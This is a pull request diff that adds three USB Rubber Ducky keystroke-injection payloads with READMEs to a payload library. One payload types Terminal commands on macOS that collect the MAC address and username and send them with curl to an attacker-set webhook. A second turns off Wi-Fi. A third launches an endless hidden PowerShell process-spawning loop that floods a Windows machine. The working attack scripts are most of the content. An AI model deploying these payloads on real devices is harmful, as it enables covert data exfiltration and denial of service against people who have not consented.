### PR TITLE
Windows Spam Terminals, Exfiltrate Mac Address - MacOS, Disable WiFi - MacOS

### DIFF
--- a/payloads/library/execution/Disable WiFi - MacOS/README.md
+++ b/payloads/library/execution/Disable WiFi - MacOS/README.md
@@ -1,0 +1,24 @@
+# Disable WiFi 🛜
+
+This payload is designed to turn off the Wi-Fi on a MacOS system. To turn the Wi-Fi back on, simply modify the script to replace "off" with "on".
+
+### Details
+
+- **Title**: Disable WiFi
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Execution
+- **Target**: MacOS
+
+### Dependencies
+
+- REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+   `DEFINE #MODE off`
+
+## How It Works 📜
+
+1. Sets a user-defined modality (`#MODE`) to `on` or `off`.
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Run or stop the WiFi

--- a/payloads/library/execution/Disable WiFi - MacOS/payload.txt
+++ b/payloads/library/execution/Disable WiFi - MacOS/payload.txt
@@ -1,0 +1,53 @@
+REM_BLOCK
+##################################
+#                                #
+# Title        : Disable WiFi    #
+# Author       : bst04 - Aleff   #
+# Version      : 1.0             #
+# Category     : Execution       #
+# Target       : MacOS           #
+#                                #
+##################################
+END_REM
+
+REM Change the #MODE value to "on" if you want to run the WiFi, else leave it as "off"
+DEFINE #MODE off
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 250
+STRINGLN networksetup -setnetworkserviceenabled Wi-Fi #MODE
+DELAY 250
+GUI q

--- a/payloads/library/exfiltration/Exfiltrate Mac Address - MacOS/README.md
+++ b/payloads/library/exfiltration/Exfiltrate Mac Address - MacOS/README.md
@@ -1,0 +1,25 @@
+# Exfiltrate Mac Address - MacOS
+
+This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
+
+### Details
+
+- **Title**: Exfiltrate Mac Address
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: MacOS
+
+### Dependencies
+
+- Set the #WEBHOOK to complete the exfiltration
+   `DEFINE #WEBHOOK example`
+
+## How It Works 📜
+
+1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Acquire the mac address and the system user name
+   - Send this informations through the Webhook

--- a/payloads/library/exfiltration/Exfiltrate Mac Address - MacOS/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate Mac Address - MacOS/payload.txt
@@ -1,0 +1,55 @@
+REM_BLOCK
+####################################################
+#                                                  #
+# Title        : Exfiltrate Mac Address - MacOS    #
+# Author       : bst04 - Aleff                     #
+# Version      : 1.0                               #
+# Category     : Exfiltration                      #
+# Target       : MacOS                             #
+#                                                  #
+####################################################
+END_REM
+
+REM Set the #WEBHOOK to complete the exfiltration
+DEFINE #WEBHOOK example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 750
+STRINGLN mac=$(networksetup -getmacaddress en0) 
+DELAY 750
+STRINGLN name=$(id -un)
+DELAY 850
+STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK

--- a/payloads/library/prank/Windows Spam Terminals/README.md
+++ b/payloads/library/prank/Windows Spam Terminals/README.md
@@ -1,0 +1,22 @@
+# Windows Spam Terminals
+
+This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
+
+Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
+
+### Details
+
+- **Title**: Windows Spam Terminals
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Prank
+- **Target**: Windows
+
+### Dependencies
+
+This payload is plug and play <3
+
+## How It Works 📜
+
+1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
+2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals

--- a/payloads/library/prank/Windows Spam Terminals/payload.txt
+++ b/payloads/library/prank/Windows Spam Terminals/payload.txt
@@ -1,0 +1,58 @@
+REM_BLOCK
+############################################
+#                                          #
+# Title        : Windows Spam Terminals    #
+# Author       : bst04 - Aleff             #
+# Version      : 1.0                       #
+# Category     : Prank                     #
+# Target       : Windows                   #
+#                                          #
+############################################
+END_REM
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        Windows fully passive OS Detection and passive Detect Ready
+        Includes its own passive detect ready.
+        Does not require additional extensions.
+
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+            $_OS will be set to WINDOWS or NOT_WINDOWS
+            See end of payload for usage within payload
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #MAX_WAIT 150
+    DEFINE #CHECK_INTERVAL 20
+    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE #NOT_WINDOWS 7
+
+    $_OS = #NOT_WINDOWS
+
+    VAR $MAX_TRIES = #MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY #CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    END_IF
+
+    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+        IF ($_OS == WINDOWS) THEN
+            STRING HELLO WINDOWS!
+        ELSE
+            STRING HELLO WORLD!
+        END_IF
+    END_REM
+END_EXTENSION
+
+GUI r 
+DELAY 500
+STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"


### PR DESCRIPTION
Implementing 3 payloads for Windows and MacOS to Hak5 - USB Rubber Ducky.

- Windows Spam Terminal: Implementing a payload that is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
- Exfiltrate Mac Address - MacOS: This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
- Disable WiFI - MacOS: This payload is designed to turn off the Wi-Fi on a MacOS system.